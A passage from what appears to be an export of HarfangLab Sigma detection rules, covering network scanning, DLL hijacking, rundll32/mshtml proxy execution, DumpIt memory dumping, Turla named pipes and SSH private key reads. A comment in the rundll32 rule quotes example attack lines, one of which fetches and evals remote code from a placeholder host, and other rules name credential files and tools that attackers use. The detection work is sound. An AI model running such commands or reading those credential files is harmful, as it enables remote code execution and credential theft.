classification.Windows.Tool.SoftPerfect\n - classification.Windows.Behavior.NetworkScan\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessCompany|contains: 'SoftPerfect' # SoftPerfect, SoftPerfect Research, SoftPerfect Pty Ltd\n ProcessProduct:\n - 'Network Scanner'\n - 'SoftPerfect Network Scanner'\n\n DestinationPort:\n - '3527' # VERITAS backup\n - '5000' # DSM (Synology)\n - '6106' # VERITAS backup\n - '9392' # Veeam backup\n - '9393' # Veeam backup\n - '9401' # Veeam backup\n - '9420' # Veeam backup\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e4357fbe-399f-4671-a1bf-732a2f71a38c",
"rule_name": "Suspicious Network Activity from SoftPerfect Network Scanner",
"rule_description": "Detects suspicious network activity initiated by the SoftPerfect Network Scanner to specific ports related to backup systems.\nThis tool is frequently used by ransomware groups to identify backup systems for possible data exfiltration or encryption.\nIt is recommended to investigate the parent process to look for malicious content or behavior.\n",
"rule_creation_date": "2024-02-20",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1046",
"attack.t1595"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e45f88d6-d02f-42b9-b7f4-e484d0347052",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098678Z",
"creation_date": "2026-03-23T11:45:34.098680Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098684Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/toddycat-keep-calm-and-check-logs/110696/",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cyuserserver.yml",
"content": "title: DLL Hijacking via cyuserserver.exe\nid: e45f88d6-d02f-42b9-b7f4-e484d0347052\ndescription: |\n Detects potential Windows DLL Hijacking via cyuserserver.exe related to Cortex XDR.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securelist.com/toddycat-keep-calm-and-check-logs/110696/\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/12/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cyuserserver.exe'\n ImageLoaded|endswith: '\\ntnativeapi.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Palo Alto Networks\\'\n - '?:\\Program Files (x86)\\Palo Alto Networks\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Palo Alto Networks\\'\n - '?:\\Program Files (x86)\\Palo Alto Networks\\'\n - '?:\\Windows\\System32\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature|contains: 'Palo Alto Networks'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e45f88d6-d02f-42b9-b7f4-e484d0347052",
"rule_name": "DLL Hijacking via cyuserserver.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cyuserserver.exe related to Cortex XDR.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-12-22",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e47d7b4f-fc00-4688-b543-7d7ebf22b22e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 3,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 1,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.533467Z",
"creation_date": "2026-03-23T11:45:35.294634Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294638Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1046/",
"https://attack.mitre.org/techniques/T1049/"
],
"name": "t1046_nmap_linux.yml",
"content": "title: Nmap Execution (Linux)\nid: e47d7b4f-fc00-4688-b543-7d7ebf22b22e\ndescription: |\n Detects the execution of nmap.\n Nmap is a tool often used by attackers to map networks, services or open ports.\n It is recommended to check if the usage of nmap is legitimate as well as to investigate other suspicious activities in the same user session.\nreferences:\n - https://attack.mitre.org/techniques/T1046/\n - https://attack.mitre.org/techniques/T1049/\ndate: 2022/07/01\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1046\n - attack.t1049\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Nmap\n - classification.Linux.Behavior.NetworkScan\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/nmap'\n\n exclusion_rapid7:\n Image:\n - '/opt/rapid7/nexpose/nse/nmap/nmap'\n - '/opt/insightvm/nexpose/nse/nmap/nmap'\n - '/data/rapid7/nexpose/nse/nmap/nmap'\n\n exclusion_opmanager:\n Image: '/OpManager/Nmap/nmap'\n\n exclusion_lynis:\n ParentCommandLine:\n - '/bin/sh ./lynis audit system'\n - '/bin/sh /usr/bin/lynis audit system --cronjob'\n - '/bin/sh /usr/sbin/lynis --quick --no-colors*'\n\n exclusion_zabbix:\n - ParentCommandLine: '/bin/bash /etc/zabbix/scan_*.sh'\n - GrandparentCommandLine: '/bin/bash /etc/zabbix/scan_*.sh'\n - Ancestors|endswith: '|/usr/sbin/zabbix_agent?|/usr/lib/systemd/systemd'\n\n exclusion_version:\n CommandLine|endswith:\n - 'nmap -V'\n - 'nmap --version'\n\n exclusion_scheduled_scan:\n Ancestors|contains: '/usr/sbin/cron'\n\n exclusion_redhat_insight_client:\n ProcessGrandparentCommandLine|contains: 'insights_client/run.py'\n\n exclusion_java:\n ProcessGrandparentImage: '/usr/lib/jvm/java-?-openjdk-amd64/jre/bin/java'\n\n exclusion_cfengine:\n Ancestors|contains: '|/usr/sbin/centengine|'\n\n exclusion_cyberwatch:\n CurrentDirectory: '/home/cyberwatch/'\n Ancestors|contains: 
'/usr/sbin/sshd|/usr/bin/bash|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_tanium:\n ParentImage: '/opt/Tanium/TaniumClient/TaniumCX'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e47d7b4f-fc00-4688-b543-7d7ebf22b22e",
"rule_name": "Nmap Execution (Linux)",
"rule_description": "Detects the execution of nmap.\nNmap is a tool often used by attackers to map networks, services or open ports.\nIt is recommended to check if the usage of nmap is legitimate as well as to investigate other suspicious activities in the same user session.\n",
"rule_creation_date": "2022-07-01",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1046",
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e4b1a453-f5d9-465a-ad14-912517214255",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086555Z",
"creation_date": "2026-03-23T11:45:34.086557Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086561Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/",
"https://lolbas-project.github.io/lolbas/Binaries/Rundll32/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_jscript_rundll32_mshtml.yml",
"content": "title: Proxy Execution of JScript via mshtml and RunDLL32\nid: e4b1a453-f5d9-465a-ad14-912517214255\ndescription: |\n Detects a suspicious invocation of mshtml by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.\n It is recommended to analyze the executed script as well as child processes stemming from RunDLL32 to look for further malicious actions or contents.\nreferences:\n - https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/\n - https://lolbas-project.github.io/lolbas/Binaries/Rundll32/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2021/02/08\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - attack.execution\n - attack.t1059.007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mshtml\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # rundll32.exe javascript:\"\\..\\mshtml.dll,RunHTMLApplication \";eval(\"w=new%20ActiveXObject(\\\"WScript.Shell\\\");w.run(\\\"calc\\\");window.close()\");\n # rundll32.exe javascript:\"\\..\\mshtml, RunHTMLApplication \";x=new%20ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",\"http://xxx.xxx.xxx.xxx:9997/fqwwj\",false);x.send();eval(x.responseText);window.close(); (Koadic)\n selection_1:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n selection_2:\n CommandLine|contains|all:\n - 'RunHTMLApplication'\n - 'mshtml'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e4b1a453-f5d9-465a-ad14-912517214255",
"rule_name": "Proxy Execution of JScript via mshtml and RunDLL32",
"rule_description": "Detects a suspicious invocation of mshtml by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.\nIt is recommended to analyze the executed script as well as child processes stemming from RunDLL32 to look for further malicious actions or contents.\n",
"rule_creation_date": "2021-02-08",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.007",
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e4e89d8e-37ed-4481-b3e3-e2693f5cf335",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603391Z",
"creation_date": "2026-03-23T11:45:34.603395Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603402Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling",
"https://dfirtnt.wordpress.com/2023/07/14/rmm-screenconnect-client-side-evidence/",
"https://attack.mitre.org/techniques/T1219/002/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1219_002_screenconnect_command_via_powershell.yml",
"content": "title: PowerShell Command Executed via ScreenConnect\nid: e4e89d8e-37ed-4481-b3e3-e2693f5cf335\ndescription: |\n Detects a command execution through ScreenConnect, a legitimate remote access tool.\n Attackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\n It is recommended to investigate this command to determine its legitimacy.\nreferences:\n - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling\n - https://dfirtnt.wordpress.com/2023/07/14/rmm-screenconnect-client-side-evidence/\n - https://attack.mitre.org/techniques/T1219/002/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2023/11/10\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.ScreenConnect\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine|contains: '\\TEMP\\ScreenConnect\\\\*run.ps1'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e4e89d8e-37ed-4481-b3e3-e2693f5cf335",
"rule_name": "PowerShell Command Executed via ScreenConnect",
"rule_description": "Detects a command execution through ScreenConnect, a legitimate remote access tool.\nAttackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\nIt is recommended to investigate this command to determine its legitimacy.\n",
"rule_creation_date": "2023-11-10",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e51573be-62c7-442a-a91e-13e5a160db5e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627932Z",
"creation_date": "2026-03-23T11:45:34.627934Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627939Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_dumpit_renamed_executed.yml",
"content": "title: Renamed DumpIt Executed\nid: e51573be-62c7-442a-a91e-13e5a160db5e\ndescription: |\n Detects the execution of a renamed DumpIt binary, a tool used to create full memory dumps for forensic or diagnostic purposes on Windows systems.\n Attackers can use it to extract authentication secrets from memory and perform lateral movement within a network.\n It is recommended to analyze the execution chain associated with this alert to determine its legitimacy.\nreferences:\n - https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary\n - https://attack.mitre.org/techniques/T1003/\ndate: 2025/11/21\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.DumpIt\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'DumpIt.exe'\n\n # This is handled by the rule 59a2da9a-8334-4169-8886-427fec2a7c46\n filter_name:\n Name|contains: 'dumpit'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e51573be-62c7-442a-a91e-13e5a160db5e",
"rule_name": "Renamed DumpIt Executed",
"rule_description": "Detects the execution of a renamed DumpIt binary, a tool used to create full memory dumps for forensic or diagnostic purposes on Windows systems.\nAttackers can use it to extract authentication secrets from memory and perform lateral movement within a network.\nIt is recommended to analyze the execution chain associated with this alert to determine its legitimacy.\n",
"rule_creation_date": "2025-11-21",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e521ae35-46cb-41be-8caf-a9a475264dad",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609127Z",
"creation_date": "2026-03-23T11:45:34.609131Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609138Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf",
"https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra",
"https://attack.mitre.org/techniques/T1106/"
],
"name": "t1106_turla_named_pipe_created.yml",
"content": "title: Named Pipe Created linked to Turla\nid: e521ae35-46cb-41be-8caf-a9a475264dad\ndescription: |\n Detects the creation of a Named Pipe pertaining to the Turla attacker group.\n The Turla threat group has used specific named pipes for C2 communications and lateral movement within compromised networks.\n It is recommended to monitor for any new lateral movement alerts.\nreferences:\n - https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf\n - https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\n - https://attack.mitre.org/techniques/T1106/\ndate: 2022/07/11\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.ThreatActor.Turla\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName:\n - '\\sdlrpc'\n - '\\comnap'\n - '\\iehelper'\n - '\\userpipe'\n - '\\atctl'\n\n condition: selection\nlevel: high\n#level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e521ae35-46cb-41be-8caf-a9a475264dad",
"rule_name": "Named Pipe Created linked to Turla",
"rule_description": "Detects the creation of a Named Pipe pertaining to the Turla attacker group.\nThe Turla threat group has used specific named pipes for C2 communications and lateral movement within compromised networks.\nIt is recommended to monitor for any new lateral movement alerts.\n",
"rule_creation_date": "2022-07-11",
"rule_modified_date": "2025-01-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1106",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e5ceb02d-7761-4857-9490-099154c63e43",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612615Z",
"creation_date": "2026-03-23T11:45:34.612618Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612626Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/004/",
"https://attack.mitre.org/techniques/T1021/004/"
],
"name": "t1021_004_ssh_private_key_read.yml",
"content": "title: SSH Private Key Read\nid: e5ceb02d-7761-4857-9490-099154c63e43\ndescription: |\n Detects an attempt to read the content of an SSH private key.\n The private key is the most important and secretive piece of data used when connecting to a remote host via SSH.\n An attacker can read the SSH private keys available on a compromised system to connect to other remote hosts and impersonate an existing user or service.\n It is recommended to analyze the process responsible for reading the SSH private key and to determine if it is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1552/004/\n - https://attack.mitre.org/techniques/T1021/004/\ndate: 2022/11/07\nmodified: 2025/11/24\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.004\n - attack.lateral_movement\n - attack.t1021.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_path:\n - Path:\n - '/home/*/.ssh/id_*'\n - '/root/.ssh/id_*'\n ProcessImage|contains: '?'\n - TargetPath:\n - '/home/*/.ssh/id_*'\n - '/root/.ssh/id_*'\n ProcessImage|contains: '?'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n filter_pub_key:\n - Path|endswith: '.pub'\n - TargetPath|endswith: '.pub'\n\n exclusion_ssh:\n - ProcessImage:\n - '/usr/bin/ssh'\n - '/gnu/store/*/bin/ssh'\n - ProcessParentImage: '/usr/bin/ssh'\n exclusion_scp:\n - ProcessImage: '/usr/bin/scp'\n - ProcessParentImage: '/usr/bin/scp'\n exclusion_ssh_add:\n ProcessImage: '/usr/bin/ssh-add'\n exclusion_ssh_keygen:\n ProcessImage: '/usr/bin/ssh-keygen'\n exclusion_ssh_copy:\n ProcessCommandLine|contains: 'sh /usr/bin/ssh-copy-id '\n exclusion_gnome_keyring:\n ProcessImage: '/usr/bin/gnome-keyring-daemon'\n exclusion_seahorse:\n ProcessImage: '/usr/bin/seahorse'\n exclusion_eset:\n ProcessImage|startswith: '/opt/eset/'\n exclusion_remmina:\n ProcessImage: '/usr/bin/remmina'\n 
ProcessParentCommandLine: 'bash /usr/bin/remmina-file-wrapper'\n exclusion_clamav:\n ProcessImage: '/usr/bin/clamscan'\n exclusion_zabbix:\n ProcessImage: '/usr/sbin/zabbix_server'\n exclusion_idataagent:\n ProcessImage:\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n exclusion_kdeinit:\n ProcessImage: '/usr/bin/kdeinit5'\n exclusion_dsagent:\n ProcessImage: '/opt/ds_agent/ds_am'\n ProcessGrandparentImage: '/usr/lib/systemd/systemd'\n\n exclusion_xdg_gnome:\n ProcessImage: '/usr/libexec/xdg-desktop-portal-gnome'\n ProcessParentImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n\n exclusion_gapplication_service:\n ProcessCommandLine|contains: '--gapplication-service'\n ProcessImage:\n - '/usr/bin/nautilus'\n - '/usr/bin/gedit'\n\n exclusion_tina:\n ProcessCommandLine:\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_kde_kioslave:\n ProcessImage: '/usr/lib/x86_64-linux-gnu/libexec/kf5/kioslave5'\n\n exclusion_ansible_connection:\n # 